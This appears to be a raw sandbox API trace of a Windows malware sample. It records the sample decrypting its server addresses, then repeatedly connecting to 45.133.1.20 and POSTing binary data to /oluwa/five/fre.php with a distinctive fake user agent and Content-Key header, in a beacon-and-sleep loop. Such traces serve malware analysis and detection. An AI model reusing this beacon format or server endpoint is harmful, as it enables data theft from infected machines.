[0283.506] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0283.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.508] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0283.508] GetProcessHeap () returned 0x6a0000 [0283.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0283.508] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0283.508] GetProcessHeap () returned 0x6a0000 [0283.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0283.508] socket (af=2, type=1, protocol=6) returned 0xa58 [0283.509] connect (s=0xa58, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0283.536] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0283.536] GetProcessHeap () returned 0x6a0000 [0283.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0283.536] GetProcessHeap () returned 0x6a0000 [0283.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0283.537] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.538] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.538] GetProcessHeap () returned 0x6a0000 [0283.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba6b0 [0283.538] GetProcessHeap () returned 0x6a0000 [0283.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.538] GetProcessHeap () returned 0x6a0000 [0283.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0283.538] GetProcessHeap () returned 0x6a0000 [0283.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0283.539] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.540] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.540] GetProcessHeap () returned 0x6a0000 [0283.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0283.540] GetProcessHeap () returned 0x6a0000 [0283.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.541] send (s=0xa58, buf=0x6bd460*, len=242, flags=0) returned 242 [0283.541] send (s=0xa58, buf=0x6bb998*, len=159, flags=0) returned 159 [0283.541] GetProcessHeap () returned 0x6a0000 [0283.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0283.542] recv (in: s=0xa58, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0283.610] GetProcessHeap () returned 0x6a0000 [0283.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0283.610] GetProcessHeap () returned 0x6a0000 [0283.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0283.614] GetProcessHeap () returned 0x6a0000 [0283.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba6b0 | out: hHeap=0x6a0000) returned 1 [0283.615] GetProcessHeap () returned 0x6a0000 [0283.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0283.615] closesocket (s=0xa58) returned 0 [0283.616] GetProcessHeap () returned 0x6a0000 [0283.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0283.616] GetProcessHeap () returned 0x6a0000 [0283.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.617] GetProcessHeap () returned 0x6a0000 [0283.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0283.618] GetProcessHeap () returned 0x6a0000 [0283.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0283.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f4) returned 0xa58 [0283.641] Sleep (dwMilliseconds=0xea60) [0283.643] GetProcessHeap () returned 0x6a0000 [0283.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0283.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.658] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0283.673] GetProcessHeap () returned 0x6a0000 [0283.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.674] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0283.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.676] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.677] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.677] GetProcessHeap () returned 0x6a0000 [0283.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.679] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0283.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.680] CryptDestroyKey (hKey=0x6ad020) returned 1 [0283.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.683] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0283.683] GetProcessHeap () returned 0x6a0000 [0283.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.684] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.685] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.686] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.687] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.687] GetProcessHeap () returned 0x6a0000 [0283.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0283.688] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.688] GetProcessHeap () returned 0x6a0000 [0283.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0283.688] GetProcessHeap () returned 0x6a0000 [0283.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.689] GetProcessHeap () returned 0x6a0000 [0283.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0283.689] GetProcessHeap () returned 0x6a0000 [0283.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0283.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.696] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0283.713] GetProcessHeap () returned 0x6a0000 [0283.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0283.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.716] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0283.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.717] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.718] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.718] GetProcessHeap () returned 0x6a0000 [0283.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0283.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.719] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0283.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.720] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0283.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.721] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0283.721] GetProcessHeap () returned 0x6a0000 [0283.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.722] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0283.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0283.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.724] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0283.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0283.726] GetProcessHeap () returned 0x6a0000 [0283.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0283.726] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0283.726] GetProcessHeap () returned 0x6a0000 [0283.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0283.726] socket (af=2, type=1, protocol=6) returned 0xa5c [0283.726] connect (s=0xa5c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0283.764] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0283.765] GetProcessHeap () returned 0x6a0000 [0283.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0283.765] GetProcessHeap () returned 0x6a0000 [0283.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0283.765] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.768] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.768] GetProcessHeap () returned 0x6a0000 [0283.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba6b0 [0283.768] GetProcessHeap () returned 0x6a0000 [0283.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.769] GetProcessHeap () returned 0x6a0000 [0283.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0283.769] GetProcessHeap () returned 0x6a0000 [0283.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0283.769] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.771] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.771] GetProcessHeap () returned 0x6a0000 [0283.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0283.771] GetProcessHeap () returned 0x6a0000 [0283.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.772] send (s=0xa5c, buf=0x6bd460*, len=242, flags=0) returned 242 [0283.773] send (s=0xa5c, buf=0x6bb998*, len=159, flags=0) returned 159 [0283.773] GetProcessHeap () returned 0x6a0000 [0283.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0283.773] recv (in: s=0xa5c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0283.833] GetProcessHeap () returned 0x6a0000 [0283.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0283.837] GetProcessHeap () returned 0x6a0000 [0283.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0283.837] GetProcessHeap () returned 0x6a0000 [0283.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba6b0 | out: hHeap=0x6a0000) returned 1 [0283.837] GetProcessHeap () returned 0x6a0000 [0283.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0283.838] closesocket (s=0xa5c) returned 0 [0283.839] GetProcessHeap () returned 0x6a0000 [0283.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0283.839] GetProcessHeap () returned 0x6a0000 [0283.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.839] GetProcessHeap () returned 0x6a0000 [0283.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0283.840] GetProcessHeap () returned 0x6a0000 [0283.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0283.840] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17f8) returned 0xa5c [0283.843] Sleep (dwMilliseconds=0xea60) [0283.845] GetProcessHeap () returned 0x6a0000 [0283.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0283.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.862] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0283.875] GetProcessHeap () returned 0x6a0000 [0283.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.876] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0283.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.877] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.878] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.880] GetProcessHeap () returned 0x6a0000 [0283.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.882] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0283.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.890] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0283.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.891] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0283.891] GetProcessHeap () returned 0x6a0000 [0283.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.896] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.898] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.898] GetProcessHeap () returned 0x6a0000 [0283.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0283.898] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.898] GetProcessHeap () returned 0x6a0000 [0283.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0283.899] GetProcessHeap () returned 0x6a0000 [0283.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0283.899] GetProcessHeap () returned 0x6a0000 [0283.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0283.900] GetProcessHeap () returned 0x6a0000 [0283.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0283.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0283.926] GetProcessHeap () returned 0x6a0000 [0283.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0283.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.928] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0283.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.929] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.930] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.930] GetProcessHeap () returned 0x6a0000 [0283.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0283.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.932] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0283.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.934] CryptDestroyKey (hKey=0x6ad020) returned 1 [0283.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0283.935] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0283.935] GetProcessHeap () returned 0x6a0000 [0283.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0283.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0283.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.939] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0283.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.940] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0283.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.941] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0283.941] GetProcessHeap () returned 0x6a0000 [0283.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0283.941] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) 